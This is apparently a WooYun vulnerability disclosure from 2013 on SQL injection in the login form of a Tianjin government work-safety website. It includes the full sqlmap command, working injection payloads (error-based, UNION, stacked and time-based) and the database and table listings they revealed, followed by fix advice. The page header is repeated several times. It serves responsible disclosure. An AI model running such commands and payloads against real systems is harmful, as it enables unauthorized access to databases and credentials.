天津市安全生产监督管理局多处漏洞 | wooyun-2013-045166| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-045166

漏洞标题：天津市安全生产监督管理局多处漏洞

漏洞作者： HackBraid

提交时间：2013-12-09 12:23

修复时间：2014-01-23 12:24

公开时间：2014-01-23 12:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-12-09：细节已通知厂商并且等待厂商处理中
2013-12-13：厂商已经确认，细节仅向厂商公开
2013-12-23：细节向核心白帽子及相关领域专家公开
2014-01-02：细节向普通白帽子公开
2014-01-12：细节向实习白帽子公开
2014-01-23：细节向公众公开

简要描述：

一次简单的渗透测试

详细说明：

1.例行扫描得到两条信息：
·后台地址对外：http://www.tjsafety.gov.cn/admin/admin_login.aspx
·网站源码泄露：http://www.tjsafety.gov.cn:80/count.rar
2.先看后台地址，发现没有验证码，我加上注入语句，报错

3.对于这种报错，我只能说：原谅我的post注入！
构造语句：

sqlmap -u "http://www.tjsafety.gov.cn/admin/admin_login.aspx" --data "__VIEWSTATE=%2FwEPDwUKLTk0NjE3MzYyMWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCWJ0bl9sb2dpbl6lcdThyXLFknG1VvboWuHAlWwt&__EVENTVALIDATION=%2FwEWBAL1p4XYAgLxz5rBDgK2xoOKDwLjl%2BvcBAliOJsIm0OuSrB%2FaMOTIpUxK46l&tb_username=admin&tb_pwd=123&btn_login.x=62&btn_login.y=4" --dbs

得到如下结果：

Parameter: tb_username
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKLTk0NjE3MzYyMWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCWJ0bl9sb2dpbl6lcdThyXLFknG1VvboWuHAlWwt&__EVENTVALIDATION=/wEWBAL1p4XYAgLxz5rBDgK2xoOKDwLjl+vcBAliOJsIm0OuSrB/aMOTIpUxK46l&tb_username=admin' AND 2700=CONVERT(INT,(CHAR(58)+CHAR(110)+CHAR(116)+CHAR(119)+CHAR(58)+(SELECT (CASE WHEN (2700=2700) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(114)+CHAR(119)+CHAR(121)+CHAR(58))) AND 'nhPf'='nhPf&tb_pwd=123&btn_login.x=43&btn_login.y=14
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: __VIEWSTATE=/wEPDwUKLTk0NjE3MzYyMWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCWJ0bl9sb2dpbl6lcdThyXLFknG1VvboWuHAlWwt&__EVENTVALIDATION=/wEWBAL1p4XYAgLxz5rBDgK2xoOKDwLjl+vcBAliOJsIm0OuSrB/aMOTIpUxK46l&tb_username=admin' UNION ALL SELECT NULL, NULL, NULL, CHAR(58)+CHAR(110)+CHAR(116)+CHAR(119)+CHAR(58)+CHAR(71)+CHAR(113)+CHAR(68)+CHAR(107)+CHAR(103)+CHAR(117)+CHAR(116)+CHAR(67)+CHAR(118)+CHAR(115)+CHAR(58)+CHAR(114)+CHAR(119)+CHAR(121)+CHAR(58), NULL--  AND 'vXwZ'='vXwZ&tb_pwd=123&btn_login.x=43&btn_login.y=14
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUKLTk0NjE3MzYyMWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCWJ0bl9sb2dpbl6lcdThyXLFknG1VvboWuHAlWwt&__EVENTVALIDATION=/wEWBAL1p4XYAgLxz5rBDgK2xoOKDwLjl+vcBAliOJsIm0OuSrB/aMOTIpUxK46l&tb_username=admin'; WAITFOR DELAY '0:0:5';-- AND 'TTjf'='TTjf&tb_pwd=123&btn_login.x=43&btn_login.y=14
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUKLTk0NjE3MzYyMWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCWJ0bl9sb2dpbl6lcdThyXLFknG1VvboWuHAlWwt&__EVENTVALIDATION=/wEWBAL1p4XYAgLxz5rBDgK2xoOKDwLjl+vcBAliOJsIm0OuSrB/aMOTIpUxK46l&tb_username=admin' WAITFOR DELAY '0:0:5'-- AND 'lnOb'='lnOb&tb_pwd=123&btn_login.x=43&btn_login.y=14
---
available databases [10]:
[*] Aoqi
[*] FreeHost
[*] jtyeji
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] tjsafety

目测tjsafety这个数据库很重要，跑出表名以示危害性（政府网站，所以没有继续深入）

Database: tjsafety
[17 tables]
+-----------------------+
| dbo.Admin             |
| dbo.Article           |
| dbo.BaosongUser       |
| dbo.Category          |
| dbo.Gbook             |
| dbo.Hongtou_View_List |
| dbo.Infor_List_View   |
| dbo.User              |
| dbo.VoteItem          |
| dbo.VoteQues          |
| dbo.baosong           |
| dbo.dtproperties      |
| dbo.friendship        |
| dbo.hongtou           |
| dbo.sysconstraints    |
| dbo.syssegments       |
| dbo.zixun             |
+-----------------------+

4.我想那个后台地址的用户名密码都在dbo.Admin这个表里吧，好的，注入就检测到这里
5.网站源码泄露貌似可以得到不少信息，也不敢深入了，截完图就删源码

漏洞证明：

修复方案：

你们是专业的，只给建议：
1.后台至少加个验证码，不过最好不要对外
2.SQL注入点要严格过滤处理
3.网站源码的存在表示服务器可能被入侵过了，清理服务器
4.定期的维护检查

版权声明：转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：14

确认时间：2013-12-13 22:17

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-045166

漏洞标题：天津市安全生产监督管理局多处漏洞

相关厂商：天津市安全生产监督管理局

漏洞作者： HackBraid

提交时间：2013-12-09 12:23

修复时间：2014-01-23 12:24

公开时间：2014-01-23 12:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-045166

漏洞标题：天津市安全生产监督管理局多处漏洞

相关厂商：天津市安全生产监督管理局

漏洞作者： HackBraid

提交时间：2013-12-09 12:23

修复时间：2014-01-23 12:24

公开时间：2014-01-23 12:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-045166"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：